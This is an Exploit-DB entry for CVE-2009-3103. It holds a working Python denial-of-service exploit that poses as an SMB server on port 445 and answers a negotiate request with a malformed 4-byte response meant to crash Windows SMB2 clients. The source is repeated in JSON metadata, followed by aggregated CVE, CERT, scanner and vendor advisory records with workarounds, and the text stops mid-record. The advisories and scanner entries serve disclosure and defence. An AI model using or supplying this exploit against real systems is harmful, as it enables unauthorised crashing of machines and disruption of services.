ID EDB-ID:12524 Type exploitdb Reporter Jelmer de Hen Modified 2010-05-07T00:00:00
Description
Windows SMB2 Negotiate Protocol (0x72) Response DoS. CVE-2009-3103. DoS exploit for the Windows platform.
#!/usr/bin/python

# === EDIT – this exploit appears to be exactly the same as one which was already found
# and fixed, notified by Laurent Gaffié; I did not know this, but his blog post can be found here:
# http://g-laurent.blogspot.com/2009/11/windows-7-server-2008r2-remote-kernel.html

import socket

print("Malformed negotiate protocol response and quickly closing the connection causes Windows machines supporting SMB2 to crash (leaves the system hanging and unresponsive) -- tested on Win 7 build 2600")
print("Written by Jelmer de Hen")
print("Published at http://h.ackack.net/?p=387")

# Act as the SMB server: listen on 445/tcp and wait for a single client to connect
smb = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
smb.bind(("", 445))
smb.listen(1)
smbconn, addr = smb.accept()
print("[+] " + str(addr) + " is trying to make connection to us over port 445")

while 1:
    print("[+] Waiting for a negotiate request packet")
    new_packet = smbconn.recv(1024)
    if not new_packet:
        # Client closed the connection before sending a negotiate request
        print("[-] Client closed the connection before sending a negotiate request")
        break
    # In a NetBIOS-framed SMB message (4-byte NetBIOS session header, then "\xffSMB"
    # at bytes 4-7) byte 8 is the SMB command; 0x72 ('r') is Negotiate Protocol
    if len(new_packet) > 8 and new_packet[8:9] == b"r":
        print("[+] Received the negotiate request packet injecting the 4 bytes now...")
        # NetBIOS session header announcing a 1-byte message, sent with no body
        smbconn.send(b"\x00\x00\x00\x01")
        break
print("[+] Closing connection... This is part of the exploit")
smbconn.close()
print("[+] Done, if all went good then the box on the other side crashed")
{"cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "references": [], "href": "https://www.exploit-db.com/exploits/12524/", "objectVersion": "1.0", "sourceHref": "https://www.exploit-db.com/download/12524/", "sourceData": "#!/usr/bin/python\r\n\r\n# === EDIT \u00e2\u0080\u0093 this exploit appears to be exactly the same one of one which was already found\r\n# and fixed notified by Laurent Gaffi\u0102\u0160, i did not know this but his blog post can be found here:\r\n# http://g-laurent.blogspot.com/2009/11/windows-7-server-2008r2-remote-kernel.html\r\n\r\nimport socket,sys,time\r\n\r\nprint \"Maliformed negotiate protocol response and quickly closing the connection causes Windows machines supporting SMB2 to crash (leaves the system hanging and unresponsive) -- tested on Win 7 build 2600\"\r\nprint \"Written by Jelmer de Hen\"\r\nprint \"Published at http://h.ackack.net/?p=387\"\r\nsmb = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\nsmb.bind((\"\", 445))\r\nsmb.listen(1)\r\nsmbconn, addr = smb.accept()\r\nprint \"[+] \"+str(addr)+\" is trying to make connection to us over port 445\"\r\nwhile 1:\r\n\tnew_packet = smbconn.recv(1024)\r\n\tprint \"[+] Waiting for a negotiate request packet\"\r\n\tif new_packet[8]==\"r\":\r\n\t\tprint \"[+] Received the negotiate request packet injecting the 4 bytes now...\"\r\n\t\tsmbconn.send(\"\\x00\\x00\\x00\\x01\")\r\n\t\tbreak\r\nprint \"[+] Closing connection... This is part of the exploit\"\r\nsmbconn.close()\r\nprint \"[+] Done, if all went good then the box on the other side crashed\"\r\n\r\n\r\n", "osvdbidlist": ["57799"], "title": "Windows SMB2 Negotiate Protocol 0x72 Response DoS", "bulletinFamily": "exploit", "modified": "2010-05-07T00:00:00", "hash": "eb2356dce20c4ddc4a501b38a6ee788705b689716b16fd2d29f7f67b79923faa", "description": "Windows SMB2 Negotiate Protocol (0x72) Response DOS. CVE-2009-3103. 
Dos exploit for windows platform", "lastseen": "2016-02-01T16:42:10", "edition": 1, "cvelist": ["CVE-2009-3103"], "published": "2010-05-07T00:00:00", "viewCount": 24, "type": "exploitdb", "reporter": "Jelmer de Hen", "history": [], "id": "EDB-ID:12524", "enchantments": {"vulnersScore": 4.0}}
{"result": {"cve": [{"id": "CVE-2009-3103", "type": "cve", "title": "CVE-2009-3103", "description": "Array index error in the SMBv2 protocol implementation in srv2.sys in Microsoft Windows Vista Gold, SP1, and SP2, Windows Server 2008 Gold and SP2, and Windows 7 RC allows remote attackers to execute arbitrary code or cause a denial of service (system crash) via an & (ampersand) character in a Process ID High header field in a NEGOTIATE PROTOCOL REQUEST packet, which triggers an attempted dereference of an out-of-bounds memory location, aka \"SMBv2 Negotiation Vulnerability.\" NOTE: some of these details are obtained from third party information.", "published": "2009-09-08T18:30:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-3103", "cvelist": ["CVE-2009-3103"], "lastseen": "2017-09-19T13:36:37"}], "cert": [{"id": "VU:135940", "type": "cert", "title": "Windows SMB version 2 vulnerability", "description": "### Overview\n\nMicrosoft Windows Vista and Server 2008 do not correctly parse SMB version 2 messages.This vulnerability could allow an attacker to execute arbitrary code.\n\n### Description\n\nThe Server Message Block version 2 (SMBv2) protocol is the successor to the original SMB protocol. SMBv2 is available in Windows Vista, Server 2008 and Windows 7 release candidates. \n\nWindows Vista and Server 2008 fail to properly process fails to properly parse the headers for the Negotiate Protocol Request portion of an SMBv2 message. \n \n--- \n \n### Impact\n\nAn attacker may be able to execute arbitrary code or cause a vulnerable system to crash. \n \n--- \n \n### Solution\n\nThere is currently no solution to this problem. Until patches are available, users and administrators are encouraged to review the below workarounds. 
\n \n--- \n \n \n**Restrict access** \n \nBlocking access to ports `139/tcp` and `445/tcp` on vulnerable systems will mitigate this vulnerability. Administrators can configure mobile systems that use the Windows Firewall to open these ports only when the user is authenticated to a domain controller by using the firewall's \"[profile](<http://technet.microsoft.com/en-us/library/dd734783\\(WS.10\\).aspx>)\" feature. \n \n**Disable SMBv2** \n \nDisabling SMBv2 will mitigate this issue. The below steps to disable SMBv2 are provided in Microsoft Security Advisory [975497](<http://www.microsoft.com/technet/security/advisory/975497.mspx>). \n\n 1. Click Start, click Run, type Regedit in the Open box, and then click OK. \n 2. Locate and then click the following registry subkey: \n 3. HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Services \n 4. Click LanmanServer. \n 5. Click Parameters. \n 6. Right-click to add a new DWORD (32 bit) Value. \n 7. Enter smb2 in the Name data field, and change the Value data field to 0. \n 8. Exit. \n 9. From a command prompt and with administrator privileges, type `net stop server` and then `net start server`. 
\n \n--- \n \n### Systems Affected \n\nVendor| Status| Date Notified| Date Updated \n---|---|---|--- \nMicrosoft Corporation| | -| 10 Sep 2009 \nIf you are a vendor and your product is affected, [let us know](<mailto:cert@cert.org?Subject=VU%23135940 Vendor Status Inquiry>).\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | N/A | N/A \nTemporal | N/A | N/A \nEnvironmental | N/A | N/A \n \n### References\n\n * <http://www.microsoft.com/technet/security/advisory/975497.mspx>\n * <http://technet.microsoft.com/en-us/library/dd734783(WS.10).aspx>\n * <http://g-laurent.blogspot.com/2009/09/windows-vista7-smb20-negotiate-protocol.html>\n\n### Credit\n\nThanks to Microsoft and Laurent Gaffi\u00e9 for information that was used in this report.\n\nThis document was written by Ryan Giobbi.\n\n### Other Information\n\n * CVE IDs: [CVE-2009-3103](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-3103>)\n * Date Public: 07 Sep 2009\n * Date First Published: 10 Sep 2009\n * Date Last Updated: 16 Sep 2009\n * Severity Metric: 62.70\n * Document Revision: 16\n\n", "published": "2009-09-10T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.kb.cert.org/vuls/id/135940", "cvelist": ["CVE-2009-3103", "CVE-2009-3103"], "lastseen": "2016-02-03T09:12:05"}], "canvas": [{"id": "SMB2_NEGOTIATE_REMOTE", "type": "canvas", "title": "Immunity Canvas: SMB2_NEGOTIATE_REMOTE", "description": "**Name**| smb2_negotiate_remote \n---|--- \n**CVE**| CVE-2009-3103 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| SMB2 Negotiate Pointer Dereference Vulnerability \n**Notes**| CVE Name: CVE-2009-3103 \nVENDOR: Microsoft \nMSADV: MS09-050 \nVersionsAffected: \nRepeatability: One shot \nReferences: http://blog.48bits.com/?p=510, http://www.microsoft.com/technet/security/Bulletin/MS09-050.mspx \nCVE Url: 
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103 \nDate public: 09/07/09 \nCVSS: 7.8 \n\n", "published": "2009-09-08T18:30:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/smb2_negotiate_remote", "cvelist": ["CVE-2009-3103"], "lastseen": "2016-09-25T14:13:49"}], "openvas": [{"id": "OPENVAS:1361412562310104116", "type": "openvas", "title": "Nmap NSE net: smb-check-vulns", "description": "Checks for vulnerabilities: * MS08-067, a Windows RPC vulnerability * Conficker, an infection by\nthe Conficker worm * Unnamed regsvc DoS, a denial-of-service vulnerability I accidentally found in\nWindows 2000 * SMBv2 exploit (CVE-2009-3103, Microsoft Security Advisory 975497) * MS06-025, a\nWindows Ras RPC service vulnerability * MS07-029, a Windows Dns Server RPC service vulnerability\n\nSYNTAX:\n\nsmbport: Override the default port choice. If 'smbport' is open, it's used. It's assumed\nto be the same protocol as port 445, not port 139. Since it probably isn't possible to change\nWindows' ports normally, this is mostly useful if you're bouncing through a relay or something. \n\nrandomseed: Set to a value to change the filenames/service names that are randomly generated. \n\nsmbbasic: Forces the authentication to use basic security, as opposed to 'extended security'. \nAgainst most modern systems, extended security should work, but there may be cases\nwhere you want to force basic. There's a chance that you'll get better results for \nenumerating users if you turn on basic authentication. \n\nsmbsign: Controls whether or not server signatures are checked in SMB packets. By default, on Windows,\nserver signatures aren't enabled or required. By default, this library will always sign \npackets if it knows how, and will check signatures if the server says to. 
Possible values are:\n\n- 'force': Always check server signatures, even if server says it doesn't support them (will \nprobably fail, but is technically more secure). \n- 'negotiate': [default] Use signatures if server supports them. \n- 'ignore': Never check server signatures. Not recommended. \n- 'disable': Don't send signatures, at all, and don't check the server's. not recommended. \nMore information on signatures can be found in 'smbauth.lua'.\n\nsafe: If set, this script will only run checks that are known (or at\nleast suspected) to be safe. \n\nunsafe: If set, this script will run checks that, if the system isn't\npatched, are basically guaranteed to crash something. Remember that\nnon-unsafe checks aren't necessarily safe either)", "published": "2011-06-01T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310104116", "cvelist": ["CVE-2009-3103"], "lastseen": "2017-12-14T11:56:15"}, {"id": "OPENVAS:1361412562310801287", "type": "openvas", "title": "Nmap NSE: SMB Check Vulnerabilities", "description": "This script attempts to check the following vulnerabilities:\n - MS08-067, a Windows RPC vulnerability\n - Conficker, an infection by the Conficker worm\n - Unnamed regsvc DoS\n - SMBv2 exploit (CVE-2009-3103)\n\n This is a wrapper on the Nmap Security Scanner's (http://nmap.org) smb-check-vulns.nse.", "published": "2010-09-23T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310801287", "cvelist": ["CVE-2009-3103"], "lastseen": "2018-04-09T11:42:04"}, {"id": "OPENVAS:1361412562310803571", "type": "openvas", "title": "Nmap NSE 6.01: smb-check-vulns", "description": "Checks for vulnerabilities: * MS08-067, a Windows RPC vulnerability * Conficker, an infection by\nthe Conficker worm * Unnamed regsvc DoS, a denial-of-service 
vulnerability I accidentally found in\nWindows 2000 * SMBv2 exploit (CVE-2009-3103, Microsoft Security Advisory 975497) * MS06-025, a\nWindows Ras RPC service vulnerability * MS07-029, a Windows Dns Server RPC service vulnerability\n\nWARNING: These checks are dangerous, and are very likely to bring down a server. These should not\nbe run in a production environment unless you (and, more importantly, the business) understand the\nrisks!\n\nAs a system administrator, performing these kinds of checks is crucial, because a lot more damage\ncan be done by a worm or a hacker using this vulnerability than by a scanner. Penetration testers,\non the other hand, might not want to use this script -- crashing services is not generally a good\nway of sneaking through a network.\n\nIf you set the script parameter 'unsafe', then scripts will run that are almost (or\ntotally) guaranteed to crash a vulnerable system; do NOT specify 'unsafe' in a production\nenvironment! And that isn't to say that non-unsafe scripts will not crash a system, they're just\nless likely to.\n\nIf you set the script parameter 'safe', then script will run that rarely or never crash a\nvulnerable system. No promises, though.\n\nMS08-067. Checks if a host is vulnerable to MS08-067, a Windows RPC vulnerability that can allow\nremote code execution. Checking for MS08-067 is very dangerous, as the check is likely to crash\nsystems. On a fairly wide scan conducted by Brandon Enright, we determined that on average, a\nvulnerable system is more likely to crash than to survive the check. Out of 82 vulnerable systems,\n\n\n\nSYNTAX:\n\nsmbport: Override the default port choice. If 'smbport' is open, it's used. It's assumed\nto be the same protocol as port 445, not port 139. Since it probably isn't possible to change\nWindows' ports normally, this is mostly useful if you're bouncing through a relay or something. \n\n\nrandomseed: Set to a value to change the filenames/service names that are randomly generated. 
\n\n\n\nsmbbasic: Forces the authentication to use basic security, as opposed to 'extended security'. \nAgainst most modern systems, extended security should work, but there may be cases\nwhere you want to force basic. There's a chance that you'll get better results for \nenumerating users if you turn on basic authentication. \n\n\nsmbsign: Controls whether or not server signatures are checked in SMB packets. By default, on Windows,\nserver signatures aren't enabled or required. By default, this library will always sign \npackets if it knows how, and will check signatures if the server says to. Possible values are:\n\n- 'force': Always check server signatures, even if server says it doesn't support them (will \nprobably fail, but is technically more secure). \n\n- 'negotiate': [default] Use signatures if server supports them. \n\n- 'ignore': Never check server signatures. Not recommended. \n\n- 'disable': Don't send signatures, at all, and don't check the server's. not recommended. \nMore information on signatures can be found in 'smbauth.lua'.\n\n\nsafe: If set, this script will only run checks that are known (or at\nleast suspected) to be safe. \n\n\n\nunsafe: If set, this script will run checks that, if the system isn't\npatched, are basically guaranteed to crash something. 
Remember that\nnon-unsafe checks aren't necessarily safe either)", "published": "2013-02-28T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310803571", "cvelist": ["CVE-2009-3103"], "lastseen": "2018-04-09T11:42:04"}, {"id": "OPENVAS:104116", "type": "openvas", "title": "Nmap NSE net: smb-check-vulns", "description": "Checks for vulnerabilities: * MS08-067, a Windows RPC vulnerability * Conficker, an infection by\nthe Conficker worm * Unnamed regsvc DoS, a denial-of-service vulnerability I accidentally found in\nWindows 2000 * SMBv2 exploit (CVE-2009-3103, Microsoft Security Advisory 975497) * MS06-025, a\nWindows Ras RPC service vulnerability * MS07-029, a Windows Dns Server RPC service vulnerability\n\nSYNTAX:\n\nsmbport: Override the default port choice. If 'smbport' is open, it's used. It's assumed\nto be the same protocol as port 445, not port 139. Since it probably isn't possible to change\nWindows' ports normally, this is mostly useful if you're bouncing through a relay or something. \n\nrandomseed: Set to a value to change the filenames/service names that are randomly generated. \n\nsmbbasic: Forces the authentication to use basic security, as opposed to 'extended security'. \nAgainst most modern systems, extended security should work, but there may be cases\nwhere you want to force basic. There's a chance that you'll get better results for \nenumerating users if you turn on basic authentication. \n\nsmbsign: Controls whether or not server signatures are checked in SMB packets. By default, on Windows,\nserver signatures aren't enabled or required. By default, this library will always sign \npackets if it knows how, and will check signatures if the server says to. Possible values are:\n\n- 'force': Always check server signatures, even if server says it doesn't support them (will \nprobably fail, but is technically more secure). 
\n- 'negotiate': [default] Use signatures if server supports them. \n- 'ignore': Never check server signatures. Not recommended. \n- 'disable': Don't send signatures, at all, and don't check the server's. not recommended. \nMore information on signatures can be found in 'smbauth.lua'.\n\nsafe: If set, this script will only run checks that are known (or at\nleast suspected) to be safe. \n\nunsafe: If set, this script will run checks that, if the system isn't\npatched, are basically guaranteed to crash something. Remember that\nnon-unsafe checks aren't necessarily safe either)", "published": "2011-06-01T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://plugins.openvas.org/nasl.php?oid=104116", "cvelist": ["CVE-2009-3103"], "lastseen": "2017-07-02T21:13:26"}, {"id": "OPENVAS:1361412562310100283", "type": "openvas", "title": "Microsoft Windows SMB2 '_Smb2ValidateProviderCallback()' Remote Code Execution Vulnerability", "description": "Microsoft Windows is prone to a remote code-execution vulnerability\nwhen processing the protocol headers for the Server Message Block\n(SMB) Negotiate Protocol Request.\n\nNOTE: Reportedly, for this issue to be exploitable, file sharing must\n be enabled.\n\nAn attacker can exploit this issue to execute code with SYSTEM-level\nprivileges; failed exploit attempts will likely cause denial-of-\nservice conditions.\n\nWindows 7 RC, Vista and 2008 Server are vulnerable; other versions may\nalso be affected.\n\nNOTE: Reportedly, Windows XP and 2000 are not affected.\n\nUPDATE (September 9, 2009): Symantec has confirmed the issue on\nWindows Vista SP1 and Windows Server 2008.", "published": "2009-10-01T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310100283", "cvelist": ["CVE-2009-3103"], "lastseen": "2018-04-06T11:40:37"}, {"id": "OPENVAS:100283", 
"type": "openvas", "title": "Microsoft Windows SMB2 '_Smb2ValidateProviderCallback()' Remote Code Execution Vulnerability", "description": "Microsoft Windows is prone to a remote code-execution vulnerability\nwhen processing the protocol headers for the Server Message Block\n(SMB) Negotiate Protocol Request.\n\nNOTE: Reportedly, for this issue to be exploitable, file sharing must\n be enabled.\n\nAn attacker can exploit this issue to execute code with SYSTEM-level\nprivileges; failed exploit attempts will likely cause denial-of-\nservice conditions.\n\nWindows 7 RC, Vista and 2008 Server are vulnerable; other versions may\nalso be affected.\n\nNOTE: Reportedly, Windows XP and 2000 are not affected.\n\nUPDATE (September 9, 2009): Symantec has confirmed the issue on\nWindows Vista SP1 and Windows Server 2008.", "published": "2009-10-01T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://plugins.openvas.org/nasl.php?oid=100283", "cvelist": ["CVE-2009-3103"], "lastseen": "2017-07-02T21:14:19"}, {"id": "OPENVAS:801287", "type": "openvas", "title": "Nmap NSE: SMB Check Vulnerabilities", "description": "This script attempts to check the following vulnerabilities:\n - MS08-067, a Windows RPC vulnerability\n - Conficker, an infection by the Conficker worm\n - Unnamed regsvc DoS\n - SMBv2 exploit (CVE-2009-3103)\n\n This is a wrapper on the Nmap Security Scanner's (http://nmap.org) smb-check-vulns.nse.", "published": "2010-09-23T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://plugins.openvas.org/nasl.php?oid=801287", "cvelist": ["CVE-2009-3103"], "lastseen": "2017-09-04T14:21:56"}, {"id": "OPENVAS:803571", "type": "openvas", "title": "Nmap NSE 6.01: smb-check-vulns", "description": "Checks for vulnerabilities: * MS08-067, a Windows RPC vulnerability * Conficker, an infection by\nthe Conficker worm * Unnamed regsvc DoS, a 
denial-of-service vulnerability I accidentally found in\nWindows 2000 * SMBv2 exploit (CVE-2009-3103, Microsoft Security Advisory 975497) * MS06-025, a\nWindows Ras RPC service vulnerability * MS07-029, a Windows Dns Server RPC service vulnerability\n\nWARNING: These checks are dangerous, and are very likely to bring down a server. These should not\nbe run in a production environment unless you (and, more importantly, the business) understand the\nrisks!\n\nAs a system administrator, performing these kinds of checks is crucial, because a lot more damage\ncan be done by a worm or a hacker using this vulnerability than by a scanner. Penetration testers,\non the other hand, might not want to use this script -- crashing services is not generally a good\nway of sneaking through a network.\n\nIf you set the script parameter 'unsafe', then scripts will run that are almost (or\ntotally) guaranteed to crash a vulnerable system; do NOT specify 'unsafe' in a production\nenvironment! And that isn't to say that non-unsafe scripts will not crash a system, they're just\nless likely to.\n\nIf you set the script parameter 'safe', then script will run that rarely or never crash a\nvulnerable system. No promises, though.\n\nMS08-067. Checks if a host is vulnerable to MS08-067, a Windows RPC vulnerability that can allow\nremote code execution. Checking for MS08-067 is very dangerous, as the check is likely to crash\nsystems. On a fairly wide scan conducted by Brandon Enright, we determined that on average, a\nvulnerable system is more likely to crash than to survive the check. Out of 82 vulnerable systems,\n\n\n\nSYNTAX:\n\nsmbport: Override the default port choice. If 'smbport' is open, it's used. It's assumed\nto be the same protocol as port 445, not port 139. Since it probably isn't possible to change\nWindows' ports normally, this is mostly useful if you're bouncing through a relay or something. 
\n\n\nrandomseed: Set to a value to change the filenames/service names that are randomly generated. \n\n\n\nsmbbasic: Forces the authentication to use basic security, as opposed to 'extended security'. \nAgainst most modern systems, extended security should work, but there may be cases\nwhere you want to force basic. There's a chance that you'll get better results for \nenumerating users if you turn on basic authentication. \n\n\nsmbsign: Controls whether or not server signatures are checked in SMB packets. By default, on Windows,\nserver signatures aren't enabled or required. By default, this library will always sign \npackets if it knows how, and will check signatures if the server says to. Possible values are:\n\n- 'force': Always check server signatures, even if server says it doesn't support them (will \nprobably fail, but is technically more secure). \n\n- 'negotiate': [default] Use signatures if server supports them. \n\n- 'ignore': Never check server signatures. Not recommended. \n\n- 'disable': Don't send signatures, at all, and don't check the server's. not recommended. \nMore information on signatures can be found in 'smbauth.lua'.\n\n\nsafe: If set, this script will only run checks that are known (or at\nleast suspected) to be safe. \n\n\n\nunsafe: If set, this script will run checks that, if the system isn't\npatched, are basically guaranteed to crash something. 
Remember that\nnon-unsafe checks aren't necessarily safe either)", "published": "2013-02-28T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://plugins.openvas.org/nasl.php?oid=803571", "cvelist": ["CVE-2009-3103"], "lastseen": "2017-09-04T14:21:56"}, {"id": "OPENVAS:1361412562310900965", "type": "openvas", "title": "Microsoft Windows SMB2 Negotiation Protocol Remote Code Execution Vulnerability", "description": "This host is missing a critical security update according to\n Microsoft Bulletin MS09-050.", "published": "2009-10-15T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310900965", "cvelist": ["CVE-2009-2532", "CVE-2009-2526", "CVE-2009-3103"], "lastseen": "2018-01-02T11:05:52"}], "saint": [{"id": "SAINT:30D79D30A079078FDE7DB3C5C56D3681", "type": "saint", "title": "Windows SMB2 buffer overflow", "description": "Added: 09/20/2010 \nCVE: [CVE-2009-3103](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103>) \nBID: [36299](<http://www.securityfocus.com/bid/36299>) \nOSVDB: [57799](<http://www.osvdb.org/57799>) \n\n\n### Background\n\nSMB2 is the replacement protocol for the SMB Windows filesharing protocol. \n\n### Problem\n\nA buffer overflow vulnerability in the SMB2 Service allows remote attackers to execute arbitrary commands. \n\n### Resolution\n\nApply the patch referenced in [Microsoft Security Bulletin 09-050](<http://www.microsoft.com/technet/security/bulletin/ms09-050.mspx>). \n\n### References\n\n<http://www.microsoft.com/technet/security/bulletin/ms09-050.mspx> \n\n\n### Limitations\n\nExploit works on Windows Vista SP1 and SP2. Exploitation attempts while other SMB2 activity is taking place may cause target system to reboot. 
\n\n### Platforms\n\nWindows Vista \n \n\n", "published": "2010-09-20T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/windows_smb2", "cvelist": ["CVE-2009-3103"], "lastseen": "2017-01-10T14:03:43"}, {"id": "SAINT:1E9A2A7C6228790D4846596C8DA04D49", "type": "saint", "title": "Windows SMB2 buffer overflow", "description": "Added: 09/20/2010 \nCVE: [CVE-2009-3103](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103>) \nBID: [36299](<http://www.securityfocus.com/bid/36299>) \nOSVDB: [57799](<http://www.osvdb.org/57799>) \n\n\n### Background\n\nSMB2 is the replacement protocol for the SMB Windows filesharing protocol. \n\n### Problem\n\nA buffer overflow vulnerability in the SMB2 Service allows remote attackers to execute arbitrary commands. \n\n### Resolution\n\nApply the patch referenced in [Microsoft Security Bulletin 09-050](<http://www.microsoft.com/technet/security/bulletin/ms09-050.mspx>). \n\n### References\n\n<http://www.microsoft.com/technet/security/bulletin/ms09-050.mspx> \n\n\n### Limitations\n\nExploit works on Windows Vista SP1 and SP2. Exploitation attempts while other SMB2 activity is taking place may cause target system to reboot. 
\n\n### Platforms\n\nWindows Vista \n \n\n", "published": "2010-09-20T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/windows_smb2", "cvelist": ["CVE-2009-3103"], "lastseen": "2016-10-03T15:01:57"}, {"id": "SAINT:214C8A991DD5F17EF7735584268D3CB3", "type": "saint", "title": "Windows SMB2 buffer overflow", "description": "Added: 09/20/2010 \nCVE: [CVE-2009-3103](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103>) \nBID: [36299](<http://www.securityfocus.com/bid/36299>) \nOSVDB: [57799](<http://www.osvdb.org/57799>) \n\n\n### Background\n\nSMB2 is the replacement protocol for the SMB Windows filesharing protocol. \n\n### Problem\n\nA buffer overflow vulnerability in the SMB2 Service allows remote attackers to execute arbitrary commands. \n\n### Resolution\n\nApply the patch referenced in [Microsoft Security Bulletin 09-050](<http://www.microsoft.com/technet/security/bulletin/ms09-050.mspx>). \n\n### References\n\n<http://www.microsoft.com/technet/security/bulletin/ms09-050.mspx> \n\n\n### Limitations\n\nExploit works on Windows Vista SP1 and SP2. Exploitation attempts while other SMB2 activity is taking place may cause target system to reboot. \n\n### Platforms\n\nWindows Vista \n \n\n", "published": "2010-09-20T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/windows_smb2", "cvelist": ["CVE-2009-3103"], "lastseen": "2016-12-14T16:58:06"}], "exploitdb": [{"id": "EDB-ID:9594", "type": "exploitdb", "title": "Windows Vista/7 SMB2.0 Negotiate Protocol Request Remote BSOD Vuln", "description": "Windows Vista/7 SMB2.0 Negotiate Protocol Request Remote BSOD Vuln. CVE-2009-3103. 
Dos exploit for windows platform", "published": "2009-09-09T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.exploit-db.com/exploits/9594/", "cvelist": ["CVE-2009-3103"], "lastseen": "2016-02-01T10:56:58"}, {"id": "EDB-ID:10005", "type": "exploitdb", "title": "Windows 7 / Server 2008R2 - Remote Kernel Crash", "description": "Windows 7 / Server 2008R2 Remote Kernel Crash. CVE-2009-3103. Dos exploit for windows platform", "published": "2009-11-11T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.exploit-db.com/exploits/10005/", "cvelist": ["CVE-2009-3103"], "lastseen": "2016-02-01T11:42:59"}, {"id": "EDB-ID:16363", "type": "exploitdb", "title": "Microsoft Windows SRV2.SYS SMB Negotiate ProcessID Function Table Dereference", "description": "Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference. CVE-2009-3103. Remote exploit for windows platform", "published": "2010-07-03T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.exploit-db.com/exploits/16363/", "cvelist": ["CVE-2009-3103"], "lastseen": "2016-02-01T23:42:04"}, {"id": "EDB-ID:14674", "type": "exploitdb", "title": "Microsoft Windows - SRV2.SYS SMB Negotiate ProcessID Function Table Dereference MS09-050", "description": "Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference (MS09-050). CVE-2009-2526,CVE-2009-2532,CVE-2009-3103. 
